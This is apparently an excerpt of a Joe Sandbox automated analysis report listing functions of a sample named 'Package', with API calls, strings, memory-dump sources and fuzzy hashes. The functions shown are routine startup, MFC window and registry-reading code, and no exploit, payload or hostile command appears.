Instruction ID: 19b50748ad5e4484020d86198eff756914fcb63c8f2367709c52129d605e0b35
Opcode Fuzzy Hash: a66d01e9bbeb7b05a7fe51e61bb0f13bec30b74fa0938c12910d2ab232b65f9b
Instruction Fuzzy Hash: 1B014F71900318ABEB209FA0DC45FEFBBB8EB45714F000419F515B62D0DBB56985CBB1

Function 00D3EE23 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?,00D423D8,00000058), ref: 00D3EE38
Sleep.KERNEL32(000003E8), ref: 00D3EE6D
_amsg_exit.MSVCRT ref: 00D3EE82
_initterm.MSVCRT ref: 00D3EED6
__IsNonwritableInCurrentImage.LIBCMT ref: 00D3EF02
exit.MSVCRT ref: 00D3EF85

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: d5c8eb705918bebf7ae9d9858d6bfe28da6d30507443b015dddecb45af8b0926
Instruction ID: aa3ce83a2754c2fee18c14ed8533da32142bbf86fff643e177c82fc5d7a36909
Opcode Fuzzy Hash: d5c8eb705918bebf7ae9d9858d6bfe28da6d30507443b015dddecb45af8b0926
Instruction Fuzzy Hash: BA41DE7AA443659FDB249F68E80576A77A1FB55B20F18423AF841E73D0CBB08D81CB70

Function 6E2F582A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E2F586D
_strrchr.LIBCMT ref: 6E2F5877
_strrchr.LIBCMT ref: 6E2F588C

Part of subcall function 6E2F5602: HeapFree.KERNEL32(00000000,00000000,?,6E2F4C74), ref: 6E2F5618
Part of subcall function 6E2F5602: GetLastError.KERNEL32(?,?,6E2F4C74), ref: 6E2F5623

Part of subcall function 6E2F551E: IsProcessorFeaturePresent.KERNEL32(00000017,6E2F550D,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,?,6E2F5484,?,00000000,6E2F8E7D,?,6E2F8FEA), ref: 6E2F5520
Part of subcall function 6E2F551E: GetCurrentProcess.KERNEL32(C0000417,6E2F8FEA,?,00000000,?,00000000,?,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,6E2F8E7D,?), ref: 6E2F5543
Part of subcall function 6E2F551E: TerminateProcess.KERNEL32(00000000,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,6E2F8E7D,?,00000000,00000000,6E304988,0000002C,6E2F8EEE,?), ref: 6E2F554A

Strings

.com, xrefs: 6E2F5997, 6E2F59A1

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
String ID: .com
API String ID: 3694955208-4200470757
Opcode ID: f282d27ad773841ca7a4f7397c51f840f5eba7fff1f880eee156e6a86857a71d
Instruction ID: dbd53f4880ee9a842489f446c7f4db4812bdbaa6a545a2b2b58b350a49331d86
Opcode Fuzzy Hash: f282d27ad773841ca7a4f7397c51f840f5eba7fff1f880eee156e6a86857a71d
Instruction Fuzzy Hash: 8C511A765D420EEBE7054AF49C91F9BFB6FAF42778F108919E8109B185FB21DD0386A0

Function 00D3D2F7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00D3D35B
lstrcatW.KERNEL32(?,00D260AC), ref: 00D3D376
lstrcatW.KERNEL32(?,?), ref: 00D3D37E

Strings

APPID\%s, xrefs: 00D3D355
AppID, xrefs: 00D3D336

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: lstrcat$wsprintf
String ID: APPID\%s$AppID
API String ID: 3128662910-1823611323
Opcode ID: 09605909f06430a2cd855f18b4b123f686d44d7bff5788bd38b3af1d36716238
Instruction ID: 8e4100b1b1d993a12a246a8bb1183bab9c69a076256dbda6a318999a48c0c1a8
Opcode Fuzzy Hash: 09605909f06430a2cd855f18b4b123f686d44d7bff5788bd38b3af1d36716238
Instruction Fuzzy Hash: 3F016DB5900318AFCB10EF24DC4AE9B7BBCEB19704F104195B915A3242D674AE888FB0

Function 00D316C0 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

#2244.MFC42U(?,00000001,00000002,50000000,0000E900), ref: 00D316E1
#3476.MFC42U(00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D31744
#3476.MFC42U(00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D31755
#5848.MFC42U(00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D3175D
#5906.MFC42U(00000000,000000F0,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D3176B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #3476$#2244#5848#5906
String ID:
API String ID: 2288433627-0
Opcode ID: 473ed184f702c54aa5e6e01796191d227550c68f84ae3ac8830753ac79ca208d
Instruction ID: 20d93f33988dfa75ee0724be2a66d3598b512bebe280553bf7426b74c9ba500d
Opcode Fuzzy Hash: 473ed184f702c54aa5e6e01796191d227550c68f84ae3ac8830753ac79ca208d
Instruction Fuzzy Hash: EF11A7353813257BEA245B614C49FBBBB5EDF857A0F080425BD06EB3C1DEA09C00C6B0

Function 00D31536 Relevance: 7.5, APIs: 5, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3153D
#366.MFC42U(00000004,00D30D8A,00000004), ref: 00D31547
#527.MFC42U(00000004,00D30D8A,00000004), ref: 00D3155C
#529.MFC42U(00000004,00D30D8A,00000004), ref: 00D3156B
#554.MFC42U(00000004,00D30D8A,00000004), ref: 00D3157A

Part of subcall function 00D315A4: #439.MFC42U ref: 00D315B0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #366#439#527#529#554H_prolog3
String ID:
API String ID: 3098594135-0
Opcode ID: 6bf0d51a93ed43be3e532e5de8bb9dd064deed621144b856d8bec41f6e41a435
Instruction ID: 58c03c03a3aad4281dc87a37959198a381ba7a0d862c4f515c2c442a81405d75
Opcode Fuzzy Hash: 6bf0d51a93ed43be3e532e5de8bb9dd064deed621144b856d8bec41f6e41a435
Instruction Fuzzy Hash: 02F03A70805794CBE711EBA0C0167DDF7A0EF24305F50448CE5DA032C2DBB42608CB72

Function 00D33D3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00D33F53: #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00D33D6D,23685920,?,00000000,00D40996,000000FF,?,00D32096), ref: 00D33F69

#540.MFC42U(23685920,?,00000000,00D40996,000000FF,?,00D32096), ref: 00D33D80
#1105.MFC42U(00D35270,000000FF,00000000,00000000,00000004,00000000), ref: 00D33E62

Part of subcall function 00D33CFC: #543.MFC42U(00000000,?,00000000,?,00D33E30), ref: 00D33D0A
Part of subcall function 00D33CFC: InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00D33E30), ref: 00D33D19

Strings

Yh#, xrefs: 00D33E39

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1105#303#540#543CriticalInitializeSection
String ID: Yh#
API String ID: 4030040872-3982030272
Opcode ID: 176d5b2f20e3f38c9a28c77dfc2e29d62be7d4dab5322008ea63fc6b48c1ea8e
Instruction ID: ecc0b3550180b802d1c79bb5b9bf6714ef0a14ea79bc94128591e8e01cd47b32
Opcode Fuzzy Hash: 176d5b2f20e3f38c9a28c77dfc2e29d62be7d4dab5322008ea63fc6b48c1ea8e
Instruction Fuzzy Hash: B041D671E10359DFDB01DF98C956BAEBBF0FB04325F104559E421AB2A1C3B99A44CF64

Function 00D3D6F5 Relevance: 4.5, APIs: 3, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6ef9381d8f8f8055e9d97403821ab2835a68ca680b9a6248b0cde96ca34584b
Instruction ID: 4959baec1c15e4501ae835861e1f69217da6cf4d8dd98af8d3548bbcaa99e052
Opcode Fuzzy Hash: c6ef9381d8f8f8055e9d97403821ab2835a68ca680b9a6248b0cde96ca34584b
Instruction Fuzzy Hash: 09F0B27990020DFFDF128F90ED09F9E7FBAEB49344F104065FA01A2260E771DA60AB60

Function 6E2F4167 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,6E2F4161,6E2F1014,6E2F1014,?,00000000,7763BC5F,6E2F1014,00000000), ref: 6E2F4178
TerminateProcess.KERNEL32(00000000,?,6E2F4161,6E2F1014,6E2F1014,?,00000000,7763BC5F,6E2F1014,00000000), ref: 6E2F417F
ExitProcess.KERNEL32 ref: 6E2F4191

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 21723b206f888eaabd0af5dd4ec8319090398e2a3b85cb468bbfb39eda9d14ba
Instruction ID: 5e8e28da176dd76a9c8bea0a81d5e4ca9b3c15605ae59312a77f087c54934f2a
Opcode Fuzzy Hash: 21723b206f888eaabd0af5dd4ec8319090398e2a3b85cb468bbfb39eda9d14ba
Instruction Fuzzy Hash: CED09E3508050CFBEF012FA0D90CC8B7F6BEF517657244514B91A49025DFB19997DAA4

Function 00D33A60 Relevance: 3.1, APIs: 2, Instructions: 105COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00D33ACD
#2644.MFC42U(?), ref: 00D33BA6

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1662#2644
String ID:
API String ID: 3643970462-0
Opcode ID: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
Instruction ID: c4ee434a47aa921f54b2fca977dea3da648e16bf6aa39587b5c32b5bb8fa88f0
Opcode Fuzzy Hash: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
Instruction Fuzzy Hash: C5416034A10608EFCB55DF94C696DACBBB1EF44324F658498E881AB351D771EF41DB20

Function 00D3DE06 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

_callnewh.MSVCRT ref: 00D3DE11
malloc.MSVCRT ref: 00D3DE1E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: _callnewhmalloc
String ID:
API String ID: 2285944120-0
Opcode ID: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
Instruction ID: 502f5d055a1d5df791e7b0a741347b5d20f312fc4ab3005422dc101f62f0c09c
Opcode Fuzzy Hash: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
Instruction Fuzzy Hash: 13D0A73260012A334A312655FC0045B7E0ADA52BF0F190031F84CAE215DA11CD1086F0

Function 00D395D0 Relevance: 3.0, APIs: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D395D5

Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424

Part of subcall function 00D39597: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D395A0
Part of subcall function 00D39597: #2855.MFC42U(00000000), ref: 00D395A7

SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D395FC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#1172#2855#4704
String ID:
API String ID: 854760084-0
Opcode ID: 5bab8667c5209f300e2a6e4169ea23453eddbb8aa01ec999f0ac333b621131dc
Instruction ID: 2d001528776214ffffa2bf5514cc8facf8fc5374e9c734236e97b91c1b3e7320
Opcode Fuzzy Hash: 5bab8667c5209f300e2a6e4169ea23453eddbb8aa01ec999f0ac333b621131dc
Instruction Fuzzy Hash: A1D017322222205BE7217BB4EC59FA66699EF86320F0A4461B955DA1A2CEA0DC818670

Function 6E2F99E0 Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6E2F9A95

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c010df3e7424c9dff2b264bd105920ea3781d65ed984645e17e59a8ada74447
Instruction ID: dfc96bed7cf477b51323f82aa90e682f9029ebafb2f75a7526ae21d7968af571
Opcode Fuzzy Hash: 1c010df3e7424c9dff2b264bd105920ea3781d65ed984645e17e59a8ada74447
Instruction Fuzzy Hash: 4231EAB1C5425EEFDF018FE9D9809DEFFBABF08214F54406AE918A2110D7318956CB90

Function 00D2FC60 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

#4435.MFC42U(?,?), ref: 00D2FCCC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #4435
String ID:
API String ID: 3199213920-0
Opcode ID: 966b4798113b2ac87c14b8f65df1ef84b58b5dd390c1ed08ac427587318da6cc
Instruction ID: 8d2a27c95c66c97dfa1181fd99e9babc8ddc624be96ad031c9c28c0fb12dc8b0
Opcode Fuzzy Hash: 966b4798113b2ac87c14b8f65df1ef84b58b5dd390c1ed08ac427587318da6cc
Instruction Fuzzy Hash: 9501A2357001599BDF199B15D884BB9BB66FB95324F48403BEC0587391CB309D51DBA0

Function 00D2EAB0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2EAB7

Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E

Part of subcall function 00D2EAE6: __EH_prolog3.LIBCMT ref: 00D2EAED
Part of subcall function 00D2EAE6: #338.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EAF7
Part of subcall function 00D2EAE6: #540.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EB0B
Part of subcall function 00D2EAE6: #860.MFC42U(00D2349E,0000000C,00D2EAD7,00000004), ref: 00D2EB27
Part of subcall function 00D2EAE6: #540.MFC42U ref: 00D2EB36
Part of subcall function 00D2EAE6: #540.MFC42U ref: 00D2EB42
Part of subcall function 00D2EAE6: #4155.MFC42U(00000004), ref: 00D2EB50
Part of subcall function 00D2EAE6: #4155.MFC42U(00000008,00000004), ref: 00D2EB5A
Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00D2EB6E
Part of subcall function 00D2EAE6: #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB7E
Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB8D
Part of subcall function 00D2EAE6: #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB9D
Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBAC
Part of subcall function 00D2EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBB7
Part of subcall function 00D2EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBBF

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #3516#540$#4155#800#861H_prolog3$#338#860malloc
String ID:
API String ID: 1769621591-0
Opcode ID: 275234d491000ecfce5a82d4157d81b30bea4cf893575d47aca4f9a6599c880e
Instruction ID: 4ed9d881a663fdee8aa090ef4544812853f41d2c202540df9c0a236b8cd9f040
Opcode Fuzzy Hash: 275234d491000ecfce5a82d4157d81b30bea4cf893575d47aca4f9a6599c880e
Instruction Fuzzy Hash: ECD0C9A1E4921697DF58BBB9285275E2A91EF54300F54443DF244EA282DEB08900C635

Function 00D30D60 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D30D67

Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E

Part of subcall function 00D31536: __EH_prolog3.LIBCMT ref: 00D3153D
Part of subcall function 00D31536: #366.MFC42U(00000004,00D30D8A,00000004), ref: 00D31547
Part of subcall function 00D31536: #527.MFC42U(00000004,00D30D8A,00000004), ref: 00D3155C
Part of subcall function 00D31536: #529.MFC42U(00000004,00D30D8A,00000004), ref: 00D3156B
Part of subcall function 00D31536: #554.MFC42U(00000004,00D30D8A,00000004), ref: 00D3157A

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: H_prolog3$#366#527#529#554malloc
String ID:
API String ID: 3012659443-0
Opcode ID: f04c683dc5af62ee858d01abfafaf9d9659ef9014c4f501e20e924194209b88a
Instruction ID: 1e6f418d91d34a1cd3a3d0e82bf92e4ebdd7ce31deeaeef0cb8875b1aa9d9411
Opcode Fuzzy Hash: f04c683dc5af62ee858d01abfafaf9d9659ef9014c4f501e20e924194209b88a
Instruction Fuzzy Hash: 12D0C9A5A45206A7DF98BBF9686635D29A19F44300F54443DB285DA281DEB08A008A39

Function 00D315A4 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

#439.MFC42U ref: 00D315B0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #439
String ID:
API String ID: 466583480-0
Opcode ID: 1a9309d79157846cfe76f07928f6659eb5fe37ff77aef1a80f8ad5c1c27d7986
Instruction ID: 336e14f22fe27e6940d4cdff0e7eb2720bb43efe644681860e5758b691ae4155
Opcode Fuzzy Hash: 1a9309d79157846cfe76f07928f6659eb5fe37ff77aef1a80f8ad5c1c27d7986
Instruction Fuzzy Hash: 3AC08CB2600274678B106B4DA80688ABBDCC9817A4722005AF801A7340EAF09E0183F5

Function 00D316A0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

#4146.MFC42U(?,?,?,?), ref: 00D316B7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #4146
String ID:
API String ID: 1848845558-0
Opcode ID: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
Instruction ID: 67941684604717c05980a50cb9947f9eda39fc04dd69cdc4f242bc2128bc5e65
Opcode Fuzzy Hash: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
Instruction Fuzzy Hash: 99C0123700014DBBCF015F55DC01D9A3B69EB40320F004000FC28451A1CB72D830AA70

Function 00D3EDF0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

__wgetmainargs.KERNELBASE ref: 00D3EE14

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 8fee84e376180df1589c4ee6ee9aa2f675f938024edc234f1abec58a2f0d2f49
Instruction ID: ac975a2291436b329230227265260260a49a1176ef9974ed4f59d11c968bcb68
Opcode Fuzzy Hash: 8fee84e376180df1589c4ee6ee9aa2f675f938024edc234f1abec58a2f0d2f49
Instruction Fuzzy Hash: 0AD0C978AC1301BF8600DF1CAC03C023A68A216B027010125B591E2361D7E2C3548B72

Function 00D2E18B Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,?,00000000), ref: 00D2E19A

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

